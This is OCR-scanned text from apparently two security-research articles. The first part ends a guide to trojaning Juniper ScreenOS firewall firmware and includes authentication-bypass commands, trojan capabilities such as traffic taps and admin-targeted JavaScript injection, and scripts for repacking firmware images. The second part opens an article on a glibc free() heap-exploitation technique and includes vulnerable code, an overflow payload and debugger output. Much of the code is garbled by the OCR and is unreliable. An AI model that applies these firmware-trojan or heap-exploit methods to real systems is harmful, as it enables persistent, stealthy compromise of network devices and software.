In summary the steps to bypass firmware authentication are: 
1. Delete certificate if one has been uploaded using the command: 


ns5xt>delete crypto auth-key 


2. Upload the modified firmware image including modified boot loader. 


3. Upload the certificate using: 
ns5xt>save image-key tftp 192.168.0.21 imagekey.cer 
--[ OxA - 28 Hacks Later 


A more useful trojaned firmware can perform numerous functions leveraging 

existing ScreenOS functionality such as 

— loading a hidden shadow configuration file 

—- allowing all traffic from one IP through the Netscreen to the network 

—- a network traffic tap 

—- persistent infection via boot loader on a firmware upgrade 

-— client side attacks against Administrators via Javascript code injection 
into the web console 


--[ 0xB - Closing Scene 


If unauthorised access is gained to a device running ScreenOS it is 
possible for an attacker to replace the boot loader and operating system 
with a modified version which is undetectabl xcept by off line 
comparison with a known image. 


Juniper in-memory infection. 


A very stealthy attack is also possible due to a feature of ScreenOS. When 
loading a firmware over serial console two options are provided: 

1. Save firmware to flash and then run new firmware. 

2. Just run new firmware without saving to flash. 


In the second case the modified firmware will be wiped on reboot and the 
previously stored firmware will be run. After a reboot no trace of the 
modified firmware will be left. 


These attacks are straightforward for an attacker anywhere in the supply 
chain (ie vendors. manufacturers) or someone with physical access (ie 

third party support). If an administrator uses TFTP or HTTP to upgrade a 
Netscreen it is also possible to conduct a man-in-the-middle attack and 
replace the firmware being uploaded with a modified version on the wire. 


These attacks could be prevented by Juniper pre-installing a certificate 
for image authentication which can not be deleted or modified. 
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-—-[ O0xC - References 


— Juniper JTAC Bulletin PSN-2008-11-111 

ScreenOS Firmware Image Authenticity Notification 

"All Juniper ScreenOS Firewall Platforms are susceptible to 
circumstances in which a maliciously modified ScreenOS image can 
be installed." 


http://www.securelink.nl/nl/x/123/Screen0S-Firmware-Image-Authenticity- 
Notification 


--[ OxD - Credits 


George Romero, anticOde, the belgian, hawkes, zadig, lenny, mark, andy, 
ruxcon, kiwicon, +Mammon, +Orc 


--[ OxE Adddendum: 


~/.gdbinit for remote PowerPC debugging 


# remote connect command over USB serial link 
define netscreen 

set height 0 

set logging on 

target remote /dev/ttyUSBO0 


end 
# breakpoint aliases 
define bpl 
info breakpoints 
end 
define bpc 
clear Sarg0 
end 
define bpe 
enable Sarg0 
end 
define bpd 
disable Sarg0 
end 
# process information 


define stack 
info stack 
info frame 
info args 
info locals 
end 


define reg 


printf " r00:%08X r01:%08X r02:%08X r03:%08X", SrO, Srl, S$r2, Sr3 
printf " \t pe:%08X\n", Spc 

printf " r04:%08X% r05:%08X% r06:%08X% r07:%08X\n", Sr4, Sr5, Sr6, $r7 
printf " r08:%08X r09:%08X r10:%08X r11:%08X", Sr8, Sr9, Sr10, Srl1l1 
printf " \t 1lr:%08X\n", Slr 

printf " r12:%08X r13:%08X r14:%08X r15:%08X\n", Sr12, Sr13, Srl14, 
printf " r16:%08X r17:%08X% r18:%08X r19:%08X", Srl16, Sr17, $r18, Srl19 
printf " \tctr:%08X\n", S$ctr 

printf " r20:%08X r21:%08X% 1r22:%08X r23:%08X\n", Sr20, Sr21, Sr22, 
printf " 124:%08X r25:%08X 1r26:%08X r27:S508X", S$r24, Sr25, Sr26, Sr27 
printf " \t cr:%308X\n",Scr 

printf " r28:%08X r29:%08X 1r30:%08X r31:%08X", Sr28, Sr29, Sr30, S$r31 
printf " \txer:%08X\n", $xer 


end 


5.txt Wed Apr 26 09:43:46 2017 14 
define func 
info functions 
end 
define var 
info variables 
end 
define lib 
info sharedlibrary 
end 
define sig 
info signals 
end 
define threadic 
info threads 
end 
define u 
info udot 
end 
define dis 
disassemble Sarg0 
end 
# hex/ascii dump address 
define hexdump 
printf "%S08X ", SargOd 
printf "%S02X %02X %02X %02X %02X %02X %02X %$02X", *(unsigned char*) / 
(SargO), *(unsigned char*) (SargO + 1),* (unsigned char*) (S$arg0+2), / 
* (unsigned char*) (S$argO + 3),* (unsigned char*) (Sarg0+4), * (unsigned char*) / 
(SargO + 5),* (unsigned char*) (Sarg0+6), *(unsigned char*) (SargO + 7) 
printr "ss 
printf "%02X %02X %02X %02X %02X %02X %02X %02X",* (unsigned char*) / 
(Sarg0+8), *(unsigned char*) (S$argO + 9),* (unsigned char*) (Sarg0+10), / 
* (unsigned char*) (SargO + 11),* (unsigned char*) (Sarg0+12), / 
* (unsigned char*) (SargO + 13),* (unsigned char*) (Sarg0+14), / 
*(unsigned char*) (SargO + 15) 
printf " Sc%c%cBc%cScSc%cscs%cscSscs%csceSc%e\n", * (unsigned char*) (Sarg0),/ 
* (unsigned char*) (SargO + 1),* (unsigned char*) (S$arg0+2), / 
* (unsigned char*) (S$argO + 3),* (unsigned char*) (Sarg0+4), / 
* (unsigned char*) (SargO + 5),* (unsigned char*) (Sarg0t+6), / 
* (unsigned char*) (SargO + 7),* (unsigned char*) (Sarg0+8), / 
* (unsigned char*) (SargO + 9),* (unsigned char*) (S$arg0+10),/ 
* (unsigned char*) (SargO + 11),* (unsigned char*) (Sarg0+12), / 
* (unsigned char*) (SargO + 13),* (unsigned char*) (Sarg0+14), / 
* (unsigned char*) (SargO + 15) 
end 
# hex dump address 


define memdump 
printf "S02XS02xX%02 


(Sarg0), 

* (unsigned char*) (Sarg0 + 3 

*(unsigned char*) (Sarg0O + 5 

*(unsigned char*) (Sarg0O + 7 
printf 

(SargO0+8), 


XSO02XS02XS02XS02XS02XK", 


) 


* (unsigned char*)/ 
* (unsigned char*) (SargO + 1),* (unsigned char*) (Sarg0+2), 
),* (unsigned char*) (Sarg0+4), 
),* (unsigned char*) (Sarg0+6), 


/ 
/ 
/ 


"SO02XS02X%S02XS02XS02XS02X%02X%02X\n", * (unsigned char*)/ 
* (unsigned char*) (SargO + 9),* (unsigned char*) (S$arg0+10),/ 


*(unsigned char*) (SargO + 11),* (unsigned char*) (Sarg0+12),/ 
* (unsigned char*) (S$argO + 13),* (unsigned char*) (Sarg0+14),/ 


* (unsigned char*) (SargO + 
end 


15) 
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# process context 
define context 
printf "\n" 
printf "powerpce\n" 
printf " 1s 
printf " [regs] \n" 
reg 
printf "\n" 
printf "[%08xX] Wo. oe: 
printf " [stack] \n" 
hexdump $r1+64 
hexdump $r1+48 
hexdump $r1+32 
hexdump S$r1+16 
hexdump $rl 
hexdump S$r1-16 
hexdump $r1-32 
hexdump $r1-48 
hexdump S$r1-64 
printf "\n" 
printf "[%08xX] we Spe 
printt [code] \n" 
x /16i Spc 
printf " " 
printf " eeu 
end 
# process control 
define n 
ni 
context 
end 
define c 
continue 
context 
end 
define go 
stepi Sarg0O 
context 
end 
define goto 
tbhreak Sarg0 
continue 
context 


end 

define pret 
finish 
context 

end 


define startice 


tbreak _start 


xr 
context 
end 


define main 
tbreak main 
1a 
context 

end 


define find 
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set Sstart = (char *) Sarg0O 
set Send = (char *) Sargl 
set Spattern = (int) Sarg2 
set Sp = Sstart 

while Sp < Send 


if (*(int *) $p) == $pattern 
printf "pattern O0x%x found at OxSx\n", Spattern, Sp 
end 
set Sptt+ 
end 
end 
# gdb options 


set confirm 0 

set verbose off 

set prompt gdb-ppc> 
set output-radix 0x10 
set input-radix 0x10 


ScreenOS pack & unpack python scripts 


!/usr/local/bin/python 


nodunpack.py :: ScreenOS image unpacker 


IMPORTANT: 
requires LZMA utilities 


import sys 
import subprocess 


class sosunzip: 


def init(): 
self.header 
self.image 
self.packed 
self.out 


def unpack(self): 


print "Cutting off header and saving" 
fF = open(self.packed, ’rb’) 

fh = file(self.header, ‘wtb’ ) 

fob = file(self.image, ‘’wtb’) 


save header including 4 magic bytes for lzma blob 
head = f.read(0x00012c04) 

fh.write (head) 

fh.close() 

print "Header extracted" 


save lzma blob 

f.seek (0x00012c04) 

blob = f.read() 

fb.write (blob) 

f.close() 

fb.close() 

print "lzma blob extracted" 


fast way 

fb = open(self.image, ’‘’rtb’) 

buf = fb.read().replace (oldhead, newhead) 
flb.seek (0x0) 

fb.write (buf) 
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fb.close() 
correct dictionary size 
fb = open(self.image, ’rtb’) 
fb.seek (0x01) 
print "Correcting dictionary size 00008000" 
fo.write(chr(0x00) + chr(0x00) + chr(0x80) + chr (0x00) ) 
# read header and lzma blob 
fb.seek (0x0) 
head = fb.read (0x05) 
fb.seek (0x05) 
lzma = fb.read() 
write outheader, unknown size and 1lzma blob 
fb.seek (0x00) 
fb.write (head) 
print "Adding uncompressed size: Oxffffffffffffffft" 
fbo.write (chr (Oxff)+chr (Oxff)+chr (Oxff£)+chr (Oxff)+chr(Oxff)+chr / 
(Oxff)+chr (Oxff)+chr (Oxff) ) 
fb.write(lzma) 
fo.close() 
print ("Uncompressing LZMA blob...") 
mkimage = "".join([’lzcat ’,self.image,’ > ’',self.out]) 
subprocess.call(mkimage, shell=True) 
print "lzcat: Blob decompressed (decoder error is safe to ignore)" 
print "ScreenOS image file decompressed" 
if name == '  main__’: 
if len(sys.argv) != 4: 
print "Usage: ./sunpack.py <packed-image> <out-header> <out-image>" 
sys.exit (1) 
else: 
s = sosunzip() 
s.packed = sys.argv[1] 
s.header = sys.argv[2] 
s.out = sys.argv[3] 
s.image = "".join([sys.argv[3],’.1lzma’]) 
s.unpack () 
sys.exit (0) 


!/usr/local/bin/python 


nodpack.py :: ScreenOS image packer 


IMPORTANT: 
requires LZMA utilities installed! 


import sys 
import subprocess 


class soszip: 


def 


def 


anit: ()¢ 
self.header 
self.image 
self.packed 


pack (self): 


print ("Compressing with LZMA...") 
mklzma = "".join(["lzma", " -5 ",self.image] ) 
subprocess.call (mklzma, shell=True) 
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print ("Adding header to LZMA blob...") 
mkimage = "".join([’cat '’,self.header,’ '’,self.image,’.lzma > / 
’,self.packed] ) 


subprocess.call(mkimage, shell=True) 


rint "Fixing dictionary size 0x00012c05: 00008000 -> 00200000" 
= open(self.packed, ’r+tb’) 

.seek (0x00012c05) 

.write (chr (0x00)+ chr(0x20) + chr(0x00)+ chr(0x00) ) 

#seek to start of file 


Hh Fh Fh 'O 


f.seek (0x0) 
head = f.read(0x00012c09) 
print "Removing uncompressed size 0x00012c09: [8 bytes]" 


seek past the field to remove 
f.seek (0x00012c11) 
ub = f.read() 
rewrite the fil 
.seek (0x0) 
.write (head) 
.write (bub) 
.truncate () 
.close() 


oO 


FH FH FH FH Fh 


print "ScreenOS image file created" 


if name == '  main__’: 

if len(sys.argv) != 4: 
print "Usage: ./nodpack.py <header> <image> <screenos-image>" 
sys.exit (1) 

else: 
S = soszip() 
s.header = sys.argv[l1] 
s.image = sys.argv[2] 
s.packed = sys.argv[3] 
s.pack () 

sys.exit (0) 


[ EOF 
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---[ I. Introduction 


When articles [01] and [02] were released in Phrack 57, heap 
exploitation techniques became a common fashion. Various heap 
exploits were, and are still published on various security related 
lists and sites. Since then, the glibc code, and especially malloc.c, 
evolved dramatically and eventually, various heap protection schemes 
were added just to make exploitation harder. 


This article presents a new free() exploitation technique, different 
from those published at [06]. Yet, knowledge of [06] is assumed, 

as several concepts presented here are derived from the author’s 
writings. Our technique makes use of 4 malloc() chunks (either 
directly allocated or fake ones constructed by the attacker) and 
achieves a ’4 bytes anywhere’ result. Our study focuses on the 
current situation of the glibc malloc() code and how one can bypass 
the security measures it imposes. The first two sections act as a 
flash back and as a rehash of older knowledge. Several important 
aspects regarding malloc() are also discussed. The aforementioned 
sections act as a foundation for the sections to follow. Finally, 

a real life scenario on ClamAV is presented as demonstration for 
our technique. 


The glibc versions revised during the analysis were 2.3.6, 2.4, 2.5 
and 2.6 (the latest version at the time of writing). Version 2.3.6 
was chosen due to the fact that glibc versions greater or equal to 
2.3.5 include additional security precautions. Examples were not 
tested on systems running glibc 2.2.x since it is considered quite 
obsolete. 


This article assumes basic knowledge of malloc() internals as they 
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are described in [01] and [02]. If you haven’t read them yet then 
probably you should do so now. The reader is also urged to read 
[03], [04] and [05]. Experience on real life heap overflows is also 
suggested but not required. 


---[ II. Brief history of glibc heap exploitation 


It is of common belief that the first person to publicly talk about 
heap overflows was Solar Designer back in the July of 2000. His 
related advisory [07], introduced the unlink() technique which was 
also characterized as a non-trivial process. By that time, Solar 
Designer wouldn’t even imagine that this would be the start of a 
new era in exploitation methods. It was only a year later, in the 
August of 2001, when a more formal standardization of the term ‘heap 
overflow’ essentially appeared, right after the release of Phrack 
articles [01] and [02] written by MaxXxX and anonymous respectively. 
In his article, MaXX admitted that the technique Solar Designer had 
published, was already known ’in the wild’ and was successfully 
used on programs like Netscape browsers, traceroute, and slocate. 

A huge volume of discoveries and exploits utilizing the disclosed 
techniques hit the lights of publicity. Some of the most notable 
research done at that time were [03], [04] and [05]. 


In December 2003, Stefan Esser replies to some, innocent at the 
first sight, mail [08] announcing the availability of a dynamic 
library that protects against heap overflows. His own solution is 
very simple - just check that the ’fd’ and ’bk’ pointers are actually 
pointing where they should. His idea was then adopted by glibc-2.3.5 
along with other sanity checks thus rendering the unlink() and 
frontlink() techniques useless. The underground, at that time, 
assumes that pure malloc() heap overflows are gone but researchers 
sit back and start doing what they knew best, audit. The community 
remained silent for a long time. It is obvious that certain Oday 
techniques were developed but people appreciated their value and 
denied their disclosure. 


Fortunately, two persons decided to shed some light on the malloc () 
case. In 2005, Phatantasmal Phatasmagoria (the person responsible 
for the disclosure of the wilderness chunk exploitation techniques 
[09]) publishes the ’Malloc Malleficarum’ [06]. His paper introduces 
5 new ways of bypassing the restrictions imposed by the latest glibc 
versions and is considered quite a masterpiece even today. In May 
the 27th 2007, g463 publishes [10], a very interesting paper 
describing a new technique exploiting set_head() and the topmost 
chunk. With this method, one could achieve an ’almost 4 bytes almost 
anywhere’ condition. In this article, g463 explains how his technique 
can be used to flip the heap onto the stack and proves it by coding 
a neat exploit for file(1). The community receives another excellent 
paper which proves that exploitation is an art. 


But enough about the past. Before entering a new chapter of the 


malloc() history, the author would like to clarify a few details 
regarding malloc() internals. It’s actually the very basis of what 
will follow. 

---[ III. Various facts regarding the glibc malloc() implementation 


--[ 1. Chunk flags 


Probably, you are already familiar with the layout of the malloc() 
chunk header as well as with its ’size’ and '’prev_size’ fields. 
What is usually overlooked is the fact that apart from PREV_INUSE, 
the ’size’ field may also contain two more flags, the IS_MMAPPED 
and the NON_MAIN_ARENA, the latter being the most interesting one. 
When the NON_MAIN_ARENA flag is set, it indicates that the chunk 
is part of an independent mmap()’ed memory region. 
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--[ 2. Heaps, arenas andc 
The malloc() interface doe 
achieve it whenever possib 


architecture and the compi 


2:43:46 2017 


ontiguity 


s not guarantee contiguity but tries to 
le. In fact, depending on the underlying 
lation options, contiguity checks may not 


ven be performed. When th 
main (the default) arena i 
(requests possibly coming 
malloc() will try to alloc 
called a 'heap’. Schematic 
figure. 


system is hungry for memory, if the 

s locked and busy serving other requests 
from other threads of the same process), 
ate and initialize a new mmap()’ed region, 
ally, a heap looks like the following 


Heap hdr Arena hd 


e Chunk_1 Chunk_n 


The heap starts with a, so 


call 
(a 


led, heap header which is physically 
lso called a ’/malloc state’ 


followed by an arena header 
“mstate’). Below, 


--- snip --- 
typedef struct _heap_info { 


or just 


you can see the layout of these structures. 


mstate ar_ptr; /* Arena for this heap he 
struct _heap_info *prev; /* Previous heap x 
size_t size; /* Current size in bytes */ 
size_t mprotect_size; /* Mprotected size eG 


} heap_info; 
== sgnipe-s= 


--- snip --- 

struct malloc_state { 
mutex_t mutex; 
int flags; 
mfastbinptr fastbins[NFASTBINS]; 
mchunkptr top; 
mchunkptr last_remainder; 
mchunkptr bins[NBINS * 2 - 2]; 

binmap [BINMAPSIZE]; 


unsigned int 

struct malloc_state *next; 
INTERNAL SIZE_T system_mem; 
INTERNAL SIZE_T max_system_mem; 


}; 


typedef struct mall 
typedef struct mal 
typedef struct mal 
=> ..8nip oo 


The heap header should always be al 
since its maximum size is 1Mbyte, 


/* 
/* 
/* 
/* 
/* 
/* 
/* 
/* 
/* 
/* 


be easily calculated using the foll 


=== \Snipe-=- 
define HEAP MAX SIZI 


Ge 
Ei 


(1024%*1024) 


define heap_for_ptr(ptr) \ 
( (heap_i 


--- snip --- 


Notice that th 
3rd MSB of this integer 


arena h 


nfo *) ((unsigned long) (ptr) 


& 


Mutex for serialized access */ 
Various flags * / 
The fastbin array */ 
The top chunk ays 
The rest of a chunk split * / 
Normal size bins */ 
The bins[] bitmap */ 
Pointer to the next arena ed 
Allocated memory * / 
Max memory available i 


oc_chunk *mchunkptr; 
loc_chunk *mbinptr; 
loc_chunk *mfastbinptr; 


ligned to a 1Mbyte boundary and 
the address of a chunk’s heap can 
lowing formula. 


~ (HEAP_MAX SIZE-1) ) ) 


or not. If not, certain 
are ignored and never p 
heap header, on 
exists, which of course, 


current heap. Since th 
header, the ’ar_ptr’ 


rformed. By taking a closer 
can also notice that a fiel 

should point to th 
arena header physically borders the heap 
field can easily be calculated by adding the 


ader contains a field called ’flags’. The 
indicates wether the arena is contiguous 
contiguity checks during malloc() and free() 


look at the 
ld named ’ar_ptr’ al 


lso 
arena header of the 
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size of the heap_info structure to the address of the heap itself. 
--[ 3. The FIFO nature of the malloc() algorithm 


The glibc malloc() implementation is a first fit algorithm (as 
opposed to best fit algorithms). That is, when the user requests N 
bytes, the allocator searches for the first chunk with size bigger 
or equal to N. Then, the chunk is split, and one half (of size N) 
is returned to the user while the other half plays the role of the 
last remainder. Additionally, due to a feature called ’unsorted 
chunks’, the heap blocks are returned back to the user in a FIFO 
fashion (the most recently free()’ed blocks are first scanned). 
This may allow an attacker to allocate a chunk within various heap 
holes that may have resulted after calling free() or realloc(). 


soo Shi pras 
include <stdio.h> 
include <stdlib.h> 


int main() { 
Wold: “a, “bb, “as 


a = malloc(16); 

b = malloc(16); 

fprintf(stderr, "a = %p b = Sp\n", a, b); 

a = realloc(a, 32); 

fprintf(stderr, "a = %p b = Sp\n", a, b); 

c = malloc(16); 

fprintf(stderr, "a = %p b= Sp | c = &Sp\n", a, b, Cc); 
free (a); 

free (b); 

free(c); 


return 0; 


} 


--- snip --- 


This code will allocate two chunks of size 16. Then, the first chunk 
is realloc()’ed to a size of 32 bytes. Since the first two chunks 
are physically adjacent, there’s not enough space to extend ’a’. 

The allocator will return a new chunk which, physically, resides 
somewhere after ’a’. Hence, a hole is created before the first 
chunk. When the code requests a new chunk ’c’ of size 16, the 
allocator notices that a free chunk exists (actually, this is the 
most recently free()’ed chunk) which can be used to satisfy the 
request. The hole is returned to the user. Let’s verify. 


===. Snip\ = 

$ ./test 

a = 0x804a050 | b = 0x804a068 

a = 0x804a080 | b = 0x804a068 

a = 0x804a080 | b = 0x804a068 | c = 0x804a050 
--- snip --- 


Indeed, chunk ’c’ and the initial ’a’, have the same address. 


--[ 4. The prev_size under our control 


A potential attacker always controls the ’prev_size’ field of the 
next chunk even if they are unable to overwrite anything else. The 
‘prev_size’ lies on the last 4 bytes of the usable space of the 
attacker’s chunk. For all you C programmers, there’s a function 
called malloc_usable_size() which returns the usable size of 
malloc()’ed area given the corresponding pointer. Although there’s 
no manual page for it, glibc exports this function for the end user. 
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--[ 5. Debugging and options 


Last but not least, the signedness and size of the ’size’ and 
‘prev_size’ fields are totally configurable. You can change them 
by resetting the INTERNAL_SIZE_T constant. Throughout this article, 
the author used a x86 32bit system with a modified glibc, compiled 
with the default options. For more info on the glibc compilation 
for debugging purposes see [11], a great blog entry written by 
Echothrust’s Chariton Karamitas (hola dude!). 


---[ IV. In depth analysis on free()’s vulnerable paths 
--[ 1. Introduction 


Before getting into more details, the author would like to stress 

the fact that the technique presented here requires that the attacker 
is able to write null bytes. That is, this method targets read(), 
recv(), memcpy(), bcopy() or similar functions. The str*cpy() family 
of functions can only be exploited if certain conditions apply (e.g. 
when decoding routines like base64 etc are used). This is, actually, 
the only real life limitation that this technique faces. 


In order to bypass the restrictions imposed by glibc an attacker 

must have control over at least 4 chunks. They can overflow the 

first one and wait until the second is freed. Then, a ’4 bytes 
anywhere’ result is achieved (an alternative technique is to create 
fake chunks rather than expecting them to be allocated, just read 
on). Finding 4 contiguous chunks in the system memory is not a 
serious matter. Just consider the case of a daemon allocating a 
buffer for each client. The attacker can force the daemon to allocate 
contiguous buffers into the heap by repeatedly firing up connections 
to the target host. This is an old technique used to stabilize the 
heap state (e.g in openssl-too-open.c). Controlling the heap memory 
allocation and freeing is a fundamental precondition required to 
build any decent heap exploit after all. 


Ok, let’s start the actual analysis. Consider the following piece 
of code. 


S-— (Shp + 

include <stdio.h> 
include <stdlib.h> 
include <string.h> 
include <sys/types.h> 
include <unistd.h> 


int main(int argc, char *argv[]) { 
char *ptr, *cl;. *c2, *c3;, *c4; 
int 15: “ny ‘size 


if(arge != 3) { 
fprintf(stderr, "%s <n> <size>\n", argv[0]); 
return -1; 


n = atoi(argv[1]); 
size = atoi(argv[2]); 
for(i = 0; i < n; itt) { 
ptr = malloc(size); 
fprintf(stderr, "[~] Allocated %d bytes at %p-%p\n", 


size, ptr, ptrt+size); 


} 


cl = malloc(80); 
fprintf(stderr, "[~] Chunk 1 at %p\n", cl); 
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c2 = malloc(80); 
fprintf(stderr, "[~] Chunk 2 at %p\n", c2); 


c3 = malloc(80); 
fprintf(stderr, " 


Chunk 3 at %p\n", c3); 


c4 = malloc(80); 
fprintf(stderr, "[~] Chunk 4 at %p\n", c4); 


read(fileno(stdin), cl, Ox7fffffff); /* (1) */ 


fprintf(stderr, "[~] Freeing %p\n", c2); 
free(c2); /* (2) */ 


return 0; 
=== Nsnipr= == 


This is a very typical situation on many programs, especially network 
daemons. The for() loop emulates the ability of the user to force 

the target program perform a number of allocations, or just indicates 
that a number of allocations have already taken place before the 
attacker is able to write into a chunk. The rest of the code allocates 
four contiguous chunks. Notice that the first one is under the 
attacker’s control. At (2) the code calls free() on the second 

chunk, the one physically bordering the attacker’s block. To see 

what happens from there on, one has to delve into the glibc free() 
internals. 


When a user calls free() within the userspace, the wrapper __libc_free() 
is called. This wrapper is actually the function public_fREe() 
declared in malloc.c. Its job is to perform some basic sanity checks 
and then control is passed to _int_free() which does the hard work 

of actually freeing the chunk. The whole code of _int_free() consists 
of a ’if’, ’else if’ and ’else’ block, which handles chunks depending 
fe) 
£ 
p 
Bg 


n their properties. The ’if’ part handles chunks that belong to 

ast bins (i.e whose size is less than 64 bytes), the ’else if’ 

art is the one analyzed here and the one that handles bigger chunks. 
he last ’else’ clause is used for very big chunks, those that were 
actually allocated by mmap(). 


--[ 2. A trip to _int_free() 


In order to fully understand the structure of _int_free(), let us 
examine the following snippet. 


--- snip --- 
void _int_free(...) { 


/* Handle chunks of size less than 64 bytes. */ 


else if(...) { 
/* Handle bigger chunks. */ 


else { 
/* Handle mmap()ed chunks. */ 
} 


} 


== ASNT p tH a= 


One should actually be interested in the ’else if’ part which handles 
chunks of size larger than 64 bytes. This means, of course, that 

the exploitation method presented here works only for such chunk 
sizes but this is not much of a big obstacle as most everyday 
applications allocate chunks usually larger than this. 
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So, let’s see what happens when _int_free() is eventually reached. 
Imagine that ’p’ is the pointer to the second chunk (the chunk named 
'c2’ in the snippet of the previous section), and that the attacker 
controls the chunk just before the one passed to _int_free(). Notice 
that there are two more chunks after ’p’ which are not directly 
accessed by the attacker. Here’s a step by step guide to _int_free(). 
Make sure you read the comments very carefully. 


==> Snip; -=s 
/* Let’s handle chunks that have a size bigger than 64 bytes 
* and that are not mmap()ed. 
*/ 
else if(!chunk_is_mmapped(p)) { 
/* Get the pointer to the chunk next to the one 
* being freed. This is the pointer to the third 
* chunk (named ’c3’ in the code). 
«if 


nextchunk = chunk_at_offset(p, size); 


/* 'p’ (the chunk being freed) is checked whether it 
* is the av->top (the topmost chunk of this arena). 
* Under normal circumstances this test is passed. 

* Freeing the wilderness chunk is not a good idea 
* after all. 
xf 
if (__builtin_expect (p == av->top, 0)) { 
errstr = "double free or corruption (top)"; 
goto errout; 


} 


--- snip --- 


So, first _int_free() checks if the chunk being freed is the top 
chunk. This is of course false, so the attacker can ignore this 
test as well as the following three. 


—-- snip --- 
/* Another lightweight check. Glibc checks here if 
* the chunk next to the one being freed (the third 
* chunk, ’'c3’) lies beyond the boundaries of the 
* current arena. This is also kindly passed. 
mis 
if (__builtin_expect (contiguous (av) 
&& (char *)nextchunk >= ((char *)av->top + chunksize(av->top)), 0)) { 
errstr = "double free or corruption (out)"; 
goto errout; 


} 


/* The PREV_INUSE flag of the third chunk is checked. 
* The third chunk indicates that the second chunk 
* is in use (which is the default). 
xf 

if (__builtin_expect (!prev_inuse(nextchunk), 0)) { 
errstr = "double free or corruption (!prev)"; 
goto errout; 


} 


/* Get the size of the third chunk and check if its 
* size is less than 8 bytes or more than the system 
* allocated memory. This test is easily bypassed 
* under normal circumstances. 


Key 
nextsize = chunksize(nextchunk) ; 
if (__builtin_expect (nextchunk->size <= 2 * SIZE_SZ, 0) 
|| __builtin_expect (nextsize >= av->system_mem, 0)) { 


errstr = "free(): invalid next size (normal)"; 
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goto errout; 


--- snip --- 


Glibe will then check if backward consolidation should be performed. 
Remember that the chunk being free()’ed is the one named ’c2’ and 
that ‘cl’ is under the attacker’s control. Since ‘cl’ physically 
borders 'c2’, backward consolidation is not feasible. 


=== snip == 
/* Check if the chunk before '’p’ (named ’cl1’) is in 
* use and if not, consolidate backwards. This is false. 
* The attacker controls the first chunk and this code 
* is skipped as the first chunk is considered in use 


* (the PREV_INUSE flag of the second chunk is set). 
*/ 
if(!prev_inuse(p)) { 
} 
==—Nsnipre = 


The most interesting code snippet is probably the one below: 


—-- snip --- 
/* Is the third chunk the top one? If not then... */ 
if(nextchunk != av->top) { 
/* Get the prev_inuse flag of the fourth chunk (i.e 
* 'c4’). One must overwrite this in order for glibc 


* to believe that the third chunk is in use. This 
* way forward consolidation is avoided. 


x), 
nextinuse = inuse_bit_at_offset (nextchunk, nextsize); 
fA LORS 


bck = unsorted_chunks (av); 

fwd = bck->fd; 

p->bk = bck; 

p->fd = fwd; 

/* The 'p’ pointer is controlled by the attacker. 
* It’s the prev_size field of the second chunk 
* which is accessible at the end of the usable 
* area of the attacker’s chunk. 


* / 
bck->fd = p; 
fwd->bk = p; 
} 
==> -§ni poss 


So, (1) is eventually reached. In case you didn’t notice this is 

an old fashioned unlink() pointer exchange where unsorted_chunks (av) +8 
gets the value of ’p’. Now recall that ’p’ points to the ’/’prev_size’ 
of the chunk being freed, a piece of information that the attacker 
controls. So assuming that the attacker somehow forces the return 
value of unsorted_chunks(av)+8 to point somewhere he pleases (e.g 

-got or .dtors) then the pointer there gets the value of ’p’. 
‘prev_size’, being a 32bit integer, is not enough for storing any 

real shellcode, but it’s enough for branching anywhere via JUMP 
instructions. Let’s not cope with such minor details yet, here’s 
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to follow the aforementioned code path. 


$ 72 bytes of alphas for the data area of the first chunk 
$ 4 bytes prev_size of the next chunk (still in the data area) 
$ 4 bytes size of the second chunk (PREV_INUSE set) 

S 76 bytes of garbage for the second chunk’s data 

$ 4 bytes size of the third chunk (PREV_INUSE set) 

S 76 bytes of garbage for the third chunk’s data 

$ 4 bytes size of the fourth chunk (PREV_INUSE set) 

S$ perl -e ’print "A" x 72, 

> "\xef\xbe\xad\xde", 

> "\x51\x00\x00\x00", 

> "B" x 76, 

> "\x51\x00\x00\x00", 

SNM aS 16; 

> "\x51\x00\x00\x00"’ > VECTOR 

$ ldd ./test 


linux-gate.so.1l => (0xb7fc0000) 


libec.so.6 => /home/huku/test_builds/lib/libc.so.6 (0xb7e90000) 
/home/huku/test_builds/lib/ld-linux.so.2 (0xb7fc1000) 

S$ gdb -q ./test 

(gdb) b _int_free 

Function "_int_free" not defined. 

Make breakpoint pending on future shared library load? (y or [n]) y 


Breakpoint 1 (_int_free) 
(gdb) run 1 80 < VECTOR 
Starting program: /home/huku/test 1 80 < VECTOR 
[~] Allocated 80 bytes at 0x804a008-0x804a058 
Chunk 1 at 0x804a060 

Chunk 2 at 0x804a0b0 

Chunk 3 at 0x804a100 

Chunk 4 at 0x804a150 

Freeing 0x804a0b0 


pending. 


[- 
[- 
[- 
[> 
[- 


as se 


Breakpoint 1, 


_int_free (av=0xb7£85140, mem=0x804a0b0) 


at malloc.c:4552 


4552 Pp = mem2chunk (mem) ; 

(gdb) step 

4553 size = chunksize(p); 

(gdb) step 

4688 bck = unsorted_chunks (av); 

(gdb) step 

4689 fwd = bck->fd; 

(gdb) step 

4690 p->fd = fwd; 

(gdb) step 

4691 p->bk = bck; 

(gdb) step 

4692 if (!in_smallbin_range (size) ) 

(gdb) step 

4697 bck->fd = p; 

(gdb) print (void *)bck->fd 

Sl = (void *) Oxb7£85170 

(gdb) print (void *)p 

$2 = (void *) 0x804a0a8 

(gdb) x/4bx (void *)p 

0x804a0a8: Oxef Oxbe Oxad Oxde 

(gdb) quit 

The program is running. Exit anyway? (y or n) y 

—== "snip: -=- 

So, 'bck->fd’ has a value of Oxb7£85170, which is actually the ’ fd’ 
field of the first unsorted chunk. Then, ’fd’ gets the value of ’p’ 
which points to the ’prev_size’ of the second chunk (called ‘'c2’ 

in the code snippet). The attacker places the value Oxdeadbeef over 


there. 


Eventually, 


the following question arises: 


How can one control 
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unsorted_chunks (av)+8? Giving arbitrary values to unsorted_chunks () 
may result ina ’4 bytes anywhere’ condition, just like the old 
fashioned unlink() technique. 


---[ V. Controlling unsorted_chunks() return value 


The unsorted_chunks() macro is defined as follows. 


--- snip --- 
define unsorted_chunks(M) (bin_at(M, 1)) 
=== Snip. == 
=—S Snip = 
#define bin_at(m, i) \ 
(mbinptr) (((char *)&((m)->bins[((i) - 1) * 2])) \ 
- offsetof (struct malloc_chunk, fd) ) 
s== Sip += 


The ’M’ and ’m’ parameters of these macros refer to the arena wher 
a chunk belongs. A real life usage of unsorted_chunks() is briefly 
shown below. 


--- snip --- 
ar_ptr = arena_for_chunk (p); 


bck = unsorted_chunks (ar_ptr); 
--- snip --- 


The arena for chunk ’p’ is first looked up and then used in the 
unsorted_chunks() macro. What is now really interesting is the way 


the malloc() implementation finds the arena for a given chunk. 
==5 JSnip--=+ 
#define arena_for_chunk(ptr) \ 

